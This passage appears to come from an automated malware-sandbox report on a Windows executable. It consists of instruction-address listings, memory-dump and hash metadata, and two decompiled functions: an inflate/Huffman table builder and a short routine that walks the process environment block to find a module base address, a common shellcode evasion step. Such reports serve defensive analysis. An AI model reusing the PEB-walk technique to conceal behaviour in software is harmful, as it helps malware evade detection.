                                                                        0x00406805
                                                                        0x00406808
                                                                        0x0040680b
                                                                        0x00000000
                                                                        0x0040680b
                                                                        0x004066cf
                                                                        0x004066cf
                                                                        0x004066d0
                                                                        0x00406728
                                                                        0x00406728
                                                                        0x0040672f
                                                                        0x004067d5
                                                                        0x004067d5
                                                                        0x004067da
                                                                        0x004067dd
                                                                        0x004067e2
                                                                        0x004067e5
                                                                        0x004067ea
                                                                        0x004067ed
                                                                        0x004067f2
                                                                        0x004067f5
                                                                        0x004067f5
                                                                        0x00000000
                                                                        0x00406735
                                                                        0x00406735
                                                                        0x00406735
                                                                        0x00406735
                                                                        0x00406739
                                                                        0x00406739
                                                                        0x0040675b
                                                                        0x0040675e
                                                                        0x00406760
                                                                        0x00406763
                                                                        0x00406768
                                                                        0x0040673e
                                                                        0x0040673e
                                                                        0x00406743
                                                                        0x00406745
                                                                        0x00406747
                                                                        0x0040674c
                                                                        0x00406752
                                                                        0x00406757
                                                                        0x00406759
                                                                        0x00406759
                                                                        0x0040674e
                                                                        0x0040674e
                                                                        0x0040674e
                                                                        0x0040674c
                                                                        0x00000000
                                                                        0x0040676a
                                                                        0x00406797
                                                                        0x0040679c
                                                                        0x0040679e
                                                                        0x0040679f
                                                                        0x004067a1
                                                                        0x004067a2
                                                                        0x004067a2
                                                                        0x004067a2
                                                                        0x004067ca
                                                                        0x004067cf
                                                                        0x004067cf
                                                                        0x00000000
                                                                        0x004067cf
                                                                        0x00406768
                                                                        0x0040672f
                                                                        0x004066d2
                                                                        0x004066d2
                                                                        0x004066d3
                                                                        0x0040671d
                                                                        0x00000000
                                                                        0x0040671d
                                                                        0x004066d5
                                                                        0x004066d6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406832
                                                                        0x00406832
                                                                        0x00406832
                                                                        0x00406835
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406812
                                                                        0x00406812
                                                                        0x00406816
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040681c
                                                                        0x0040681c
                                                                        0x0040681f
                                                                        0x00406822
                                                                        0x00406827
                                                                        0x00406829
                                                                        0x0040682c
                                                                        0x0040682f
                                                                        0x0040682f
                                                                        0x0040682f
                                                                        0x00406837
                                                                        0x00406837
                                                                        0x0040683a
                                                                        0x0040683c
                                                                        0x00406841
                                                                        0x00406844
                                                                        0x00406846
                                                                        0x00406849
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040684f
                                                                        0x0040684f
                                                                        0x00406851
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406857
                                                                        0x00406857
                                                                        0x0040685b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406861
                                                                        0x00406861
                                                                        0x00406864
                                                                        0x00406866
                                                                        0x00406904
                                                                        0x00406904
                                                                        0x00406907
                                                                        0x00406909
                                                                        0x00406909
                                                                        0x0040690c
                                                                        0x0040690f
                                                                        0x00406911
                                                                        0x00406913
                                                                        0x00406915
                                                                        0x00406915
                                                                        0x0040691e
                                                                        0x00406923
                                                                        0x00406926
                                                                        0x00406929
                                                                        0x0040692c
                                                                        0x0040692f
                                                                        0x0040692f
                                                                        0x0040692f
                                                                        0x00406932
                                                                        0x00406938
                                                                        0x00406938
                                                                        0x0040693e
                                                                        0x0040693e
                                                                        0x0040693e
                                                                        0x00000000
                                                                        0x00406932
                                                                        0x0040686c
                                                                        0x0040686c
                                                                        0x00406872
                                                                        0x00406875
                                                                        0x00406877
                                                                        0x004068a2
                                                                        0x004068a5
                                                                        0x004068ab
                                                                        0x004068b0
                                                                        0x004068b6
                                                                        0x004068bc
                                                                        0x004068be
                                                                        0x004068c1
                                                                        0x004068ca
                                                                        0x004068d0
                                                                        0x004068d0
                                                                        0x004068c3
                                                                        0x004068c5
                                                                        0x004068c7
                                                                        0x004068c7
                                                                        0x004068d2
                                                                        0x004068d8
                                                                        0x004068db
                                                                        0x004068dd
                                                                        0x004068df
                                                                        0x004068e5
                                                                        0x004068e7
                                                                        0x004068e9
                                                                        0x004068ec
                                                                        0x004068f5
                                                                        0x004068f5
                                                                        0x004068f7
                                                                        0x004068ee
                                                                        0x004068ee
                                                                        0x004068f1
                                                                        0x004068f1
                                                                        0x004068f9
                                                                        0x004068f9
                                                                        0x004068e7
                                                                        0x004068fc
                                                                        0x004068fe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004068fe
                                                                        0x00406879
                                                                        0x00406879
                                                                        0x0040687f
                                                                        0x00406885
                                                                        0x00406887
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406889
                                                                        0x00406889
                                                                        0x0040688b
                                                                        0x0040688d
                                                                        0x00406890
                                                                        0x00406897
                                                                        0x00406897
                                                                        0x00406899
                                                                        0x00406892
                                                                        0x00406892
                                                                        0x00406894
                                                                        0x00406894
                                                                        0x0040689b
                                                                        0x0040689d
                                                                        0x004068a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004069a4
                                                                        0x004069a7
                                                                        0x004069aa
                                                                        0x004069b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406b87
                                                                        0x00406b87
                                                                        0x00406b87
                                                                        0x00406b8a
                                                                        0x00406b8d
                                                                        0x00406b8f
                                                                        0x00406b92
                                                                        0x00406b98
                                                                        0x00406b9f
                                                                        0x00406ba1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406a75
                                                                        0x00406a75
                                                                        0x00406a9d
                                                                        0x00406a9d
                                                                        0x00406a9d
                                                                        0x00406a9f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406a7d
                                                                        0x00406a7d
                                                                        0x00406a81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406a87
                                                                        0x00406a87
                                                                        0x00406a8a
                                                                        0x00406a8d
                                                                        0x00406a90
                                                                        0x00406a92
                                                                        0x00406a94
                                                                        0x00406a97
                                                                        0x00406a9a
                                                                        0x00406a9a
                                                                        0x00406a9a
                                                                        0x00406aa1
                                                                        0x00406aa1
                                                                        0x00406aa9
                                                                        0x00406aac
                                                                        0x00406ab2
                                                                        0x00406ab5
                                                                        0x00406ab9
                                                                        0x00406abd
                                                                        0x00406ac0
                                                                        0x00406ac3
                                                                        0x00406adb
                                                                        0x00406adb
                                                                        0x00406ade
                                                                        0x00406aec
                                                                        0x00406aef
                                                                        0x00406ae0
                                                                        0x00406ae0
                                                                        0x00406ae2
                                                                        0x00406ae9
                                                                        0x00406ae9
                                                                        0x00406b18
                                                                        0x00406b18
                                                                        0x00406b18
                                                                        0x00406b1b
                                                                        0x00406b1d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406af8
                                                                        0x00406af8
                                                                        0x00406afc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406b02
                                                                        0x00406b02
                                                                        0x00406b05
                                                                        0x00406b08
                                                                        0x00406b0b
                                                                        0x00406b0d
                                                                        0x00406b0f
                                                                        0x00406b12
                                                                        0x00406b15
                                                                        0x00406b15
                                                                        0x00406b15
                                                                        0x00406b1f
                                                                        0x00406b1f
                                                                        0x00406b21
                                                                        0x00406b23
                                                                        0x00406b2e
                                                                        0x00406b31
                                                                        0x00406b34
                                                                        0x00406b36
                                                                        0x00406b38
                                                                        0x00406b3a
                                                                        0x00406b3d
                                                                        0x00406b40
                                                                        0x00406b45
                                                                        0x00406b48
                                                                        0x00406b4b
                                                                        0x00406b4e
                                                                        0x00406b55
                                                                        0x00406b58
                                                                        0x00406b5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406b60
                                                                        0x00406b60
                                                                        0x00406b64
                                                                        0x00406b75
                                                                        0x00406b75
                                                                        0x00406b75
                                                                        0x00406b77
                                                                        0x00406b77
                                                                        0x00406b7b
                                                                        0x00406b7b
                                                                        0x00406b7b
                                                                        0x00406b7d
                                                                        0x00406b7e
                                                                        0x00406b81
                                                                        0x00406b81
                                                                        0x00406b81
                                                                        0x00406b84
                                                                        0x00000000
                                                                        0x00406b84
                                                                        0x00406b66
                                                                        0x00406b66
                                                                        0x00406b69
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406b6f
                                                                        0x00406b6f
                                                                        0x00000000
                                                                        0x00406b6f
                                                                        0x00406ac5
                                                                        0x00406ac5
                                                                        0x00406ac7
                                                                        0x00406ac9
                                                                        0x00406acc
                                                                        0x00406acf
                                                                        0x00406ad3
                                                                        0x00406ad3
                                                                        0x00406ba7
                                                                        0x00406ba7
                                                                        0x00406baa
                                                                        0x00406bb1
                                                                        0x00406bb5
                                                                        0x00406bb7
                                                                        0x00406bba
                                                                        0x00406bbd
                                                                        0x00406bc2
                                                                        0x00406bc5
                                                                        0x00406bc7
                                                                        0x00406bc8
                                                                        0x00406bcb
                                                                        0x00406bd6
                                                                        0x00406bd9
                                                                        0x00406bf0
                                                                        0x00406bf5
                                                                        0x00406bfc
                                                                        0x00406c01
                                                                        0x00406c05
                                                                        0x00406c07
                                                                        0x00406c07
                                                                        0x00406c07
                                                                        0x00406c0a
                                                                        0x00406c0c
                                                                        0x00000000
                                                                        0x00406c12
                                                                        0x00406c12
                                                                        0x00406c16
                                                                        0x00406c21
                                                                        0x00406c34
                                                                        0x00406c39
                                                                        0x00406c3e
                                                                        0x00406c40
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c46
                                                                        0x00406c46
                                                                        0x00406c49
                                                                        0x00406c4b
                                                                        0x00406c59
                                                                        0x00406c59
                                                                        0x00406c5c
                                                                        0x00406c5c
                                                                        0x00406c5f
                                                                        0x00406c62
                                                                        0x00406c65
                                                                        0x00406c68
                                                                        0x00406c6b
                                                                        0x00406c6e
                                                                        0x00000000
                                                                        0x00406c6e
                                                                        0x00406c4d
                                                                        0x00406c4d
                                                                        0x00406c53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ff2
                                                                        0x00406ff2
                                                                        0x00406ff8
                                                                        0x00406ffe
                                                                        0x00407003
                                                                        0x00407009
                                                                        0x0040700f
                                                                        0x00407011
                                                                        0x00407014
                                                                        0x0040701d
                                                                        0x00407023
                                                                        0x00407023
                                                                        0x00407016
                                                                        0x00407018
                                                                        0x0040701a
                                                                        0x0040701a
                                                                        0x00407025
                                                                        0x00407027
                                                                        0x0040702a
                                                                        0x00407065
                                                                        0x00407065
                                                                        0x00000000
                                                                        0x0040702c
                                                                        0x0040702c
                                                                        0x0040702c
                                                                        0x00407032
                                                                        0x00407035
                                                                        0x00407037
                                                                        0x0040706c
                                                                        0x0040706e
                                                                        0x00000000
                                                                        0x0040706e
                                                                        0x00000000
                                                                        0x00407037
                                                                        0x00000000
                                                                        0x00406676
                                                                        0x00407044
                                                                        0x00000000
                                                                        0x00407044
                                                                        0x00406a58
                                                                        0x00406a5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406a5c
                                                                        0x00406a5c
                                                                        0x00406a5f
                                                                        0x00000000
                                                                        0x00406a5f
                                                                        0x004069a4
                                                                        0x00406965
                                                                        0x00407049
                                                                        0x0040704c
                                                                        0x0040704e
                                                                        0x00407057
                                                                        0x0040705d
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                        • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040711C, Relevance: .3, Instructions: 300COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                        0x00407127
                                                                        0x0040712f
                                                                        0x00407133
                                                                        0x00407135
                                                                        0x00407138
                                                                        0x0040713a
                                                                        0x0040713a
                                                                        0x0040713c
                                                                        0x00407143
                                                                        0x00407145
                                                                        0x00407145
                                                                        0x0040714b
                                                                        0x00407160
                                                                        0x00407168
                                                                        0x0040716a
                                                                        0x0040716c
                                                                        0x0040716f
                                                                        0x00407170
                                                                        0x00407170
                                                                        0x00407176
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407178
                                                                        0x0040717b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717b
                                                                        0x0040717f
                                                                        0x00407182
                                                                        0x00407184
                                                                        0x00407184
                                                                        0x00407187
                                                                        0x0040718d
                                                                        0x0040718e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040718e
                                                                        0x00407193
                                                                        0x00407196
                                                                        0x00407198
                                                                        0x00407198
                                                                        0x0040719e
                                                                        0x004071a0
                                                                        0x004071b1
                                                                        0x004071a4
                                                                        0x004071a8
                                                                        0x0040744d
                                                                        0x00000000
                                                                        0x0040744d
                                                                        0x004071ae
                                                                        0x004071af
                                                                        0x004071af
                                                                        0x004071b7
                                                                        0x004071ba
                                                                        0x004071be
                                                                        0x004071c0
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004071cd
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d7
                                                                        0x004071d8
                                                                        0x004071ed
                                                                        0x004071ed
                                                                        0x004071f0
                                                                        0x004071f2
                                                                        0x004071f2
                                                                        0x004071f4
                                                                        0x004071f9
                                                                        0x004071fb
                                                                        0x00407202
                                                                        0x00407204
                                                                        0x0040720c
                                                                        0x0040720c
                                                                        0x0040720e
                                                                        0x0040720f
                                                                        0x0040721e
                                                                        0x00407222
                                                                        0x00407226
                                                                        0x00407229
                                                                        0x0040722c
                                                                        0x00407231
                                                                        0x00407234
                                                                        0x0040723a
                                                                        0x00407241
                                                                        0x00407247
                                                                        0x00407440
                                                                        0x00407440
                                                                        0x00407445
                                                                        0x00407454
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407445
                                                                        0x00407254
                                                                        0x00407257
                                                                        0x0040725a
                                                                        0x0040725d
                                                                        0x00407261
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040726c
                                                                        0x0040726f
                                                                        0x00407270
                                                                        0x00407272
                                                                        0x00407278
                                                                        0x0040727b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407281
                                                                        0x00407282
                                                                        0x00407285
                                                                        0x00407288
                                                                        0x0040728b
                                                                        0x00407291
                                                                        0x00407293
                                                                        0x00407293
                                                                        0x0040729b
                                                                        0x0040729f
                                                                        0x004072a4
                                                                        0x004072c9
                                                                        0x004072cf
                                                                        0x004072d1
                                                                        0x004072d3
                                                                        0x004072d6
                                                                        0x004072df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072a6
                                                                        0x004072a6
                                                                        0x004072af
                                                                        0x004072b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072c4
                                                                        0x004072c4
                                                                        0x004072c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072b7
                                                                        0x004072ba
                                                                        0x004072bc
                                                                        0x004072c0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072c2
                                                                        0x004072c2
                                                                        0x00000000
                                                                        0x004072c4
                                                                        0x004072e8
                                                                        0x004072ee
                                                                        0x004072f8
                                                                        0x004072fa
                                                                        0x004072ff
                                                                        0x00407301
                                                                        0x00407337
                                                                        0x00407303
                                                                        0x00407303
                                                                        0x00407306
                                                                        0x00407309
                                                                        0x00407313
                                                                        0x00407316
                                                                        0x0040731d
                                                                        0x00407328
                                                                        0x0040732f
                                                                        0x0040732f
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x0040733e
                                                                        0x00407344
                                                                        0x00407344
                                                                        0x0040734d
                                                                        0x00407350
                                                                        0x00407355
                                                                        0x00407364
                                                                        0x0040736c
                                                                        0x00407371
                                                                        0x00407395
                                                                        0x0040739d
                                                                        0x004073a1
                                                                        0x004073a7
                                                                        0x00407373
                                                                        0x00407381
                                                                        0x00407384
                                                                        0x0040738a
                                                                        0x0040738a
                                                                        0x004073ab
                                                                        0x00407366
                                                                        0x00407366
                                                                        0x00407366
                                                                        0x004073bc
                                                                        0x004073c0
                                                                        0x004073cc
                                                                        0x004073c7
                                                                        0x004073ca
                                                                        0x004073ca
                                                                        0x004073d4
                                                                        0x004073d9
                                                                        0x004073e1
                                                                        0x004073dd
                                                                        0x004073df
                                                                        0x004073df
                                                                        0x004073e7
                                                                        0x004073e9
                                                                        0x004073f0
                                                                        0x004073fa
                                                                        0x00407404
                                                                        0x00407420
                                                                        0x00407424
                                                                        0x00407269
                                                                        0x0040726f
                                                                        0x00407270
                                                                        0x00407272
                                                                        0x00407278
                                                                        0x0040727b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040727b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407406
                                                                        0x00407406
                                                                        0x00407406
                                                                        0x0040740b
                                                                        0x00407414
                                                                        0x0040741d
                                                                        0x00000000
                                                                        0x0040741d
                                                                        0x0040742a
                                                                        0x0040742a
                                                                        0x0040742d
                                                                        0x00407434
                                                                        0x00407437
                                                                        0x00000000
                                                                        0x0040725a
                                                                        0x004071da
                                                                        0x004071dc
                                                                        0x004071dc
                                                                        0x004071e0
                                                                        0x004071e3
                                                                        0x004071e4
                                                                        0x004071e4
                                                                        0x00000000
                                                                        0x004071dc
                                                                        0x00407150
                                                                        0x00407156
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                        • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                        • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                        • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 024D19A8, Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                        • Instruction ID: 733346b83b067c984604e844ffda2d3c3ecb74119856878fba039417c92b6d8f
                                                                        • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                        • Instruction Fuzzy Hash: F9010C79A11208EFCB51DF99C59099DBBF5EB08220F118596ED58E7721D330AE50DB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001000, Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                                        0x10001017

                                                                        Memory Dump Source
